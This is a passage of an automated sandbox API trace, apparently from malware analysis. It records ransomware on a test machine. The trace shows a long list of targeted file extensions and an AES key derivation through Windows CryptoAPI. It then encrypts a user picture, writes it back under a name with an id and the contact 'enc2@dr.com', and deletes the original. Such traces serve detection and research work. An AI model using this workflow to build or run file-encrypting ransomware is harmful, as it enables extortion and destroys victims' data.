.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.608] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.608] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.608] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.611] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xc025, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xc025, lpOverlapped=0x0) returned 1
	[0195.613] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.613] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0195.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.614] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.614] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.614] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0195.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.615] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xc025, dwBufLen=0xc025 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xc030) returned 1
	[0195.615] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.616] RtlMoveMemory (in: Destination=0xfe91b0, Source=0xfdd180, Length=0xc025 | out: Destination=0xfe91b0) 
	[0195.616] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.616] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe91b0*, pdwDataLen=0x18bc0c*=0xc025, dwBufLen=0xc030 | out: pbData=0xfe91b0*, pdwDataLen=0x18bc0c*=0xc030) returned 1
	[0195.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.617] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0195.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.617] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0195.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.617] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0195.617] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.617] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.618] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.618] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.620] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 81
	[0195.620] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.626] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe91b0*, nNumberOfBytesToWrite=0xc030, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe91b0*, lpNumberOfBytesWritten=0x18c068*=0xc030, lpOverlapped=0x0) returned 1
	[0195.629] CloseHandle (hObject=0x2c0) returned 1
	[0195.629] CloseHandle (hObject=0x384) returned 1
	[0195.629] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp")) returned 1
	[0195.633] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f_d-.bmp")) returned 0
	[0195.633] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99bb66a0, ftCreationTime.dwHighDateTime=0x1d9767f, ftLastAccessTime.dwLowDateTime=0xebbc60a0, ftLastAccessTime.dwHighDateTime=0x1d9769b, ftLastWriteTime.dwLowDateTime=0xebbc60a0, ftLastWriteTime.dwHighDateTime=0x1d9769b, nFileSizeHigh=0x0, nFileSizeLow=0x4bff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GBHwyEjWrOuo.gif", cAlternateFileName="GBHWYE~1.GIF")) returned 1
	[0195.633] lstrcmpW (lpString1="GBHwyEjWrOuo.gif", lpString2="..") returned 1
	[0195.633] lstrcmpW (lpString1="GBHwyEjWrOuo.gif", lpString2=".") returned 1
	[0195.633] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.633] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="GBHwyEjWrOuo.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\GBHwyEjWrOuo.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\GBHwyEjWrOuo.gif"
	[0195.633] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\GBHwyEjWrOuo.gif") returned 47
	[0195.633] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.634] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\GBHwyEjWrOuo.gif", cchLength=0x2f | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif") returned 0x2f
	[0195.634] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.634] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.634] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif"
	[0195.634] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\gbhwyejwrouo.gif") returned 47
	[0195.634] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.634] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.635] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0195.635] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.636] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi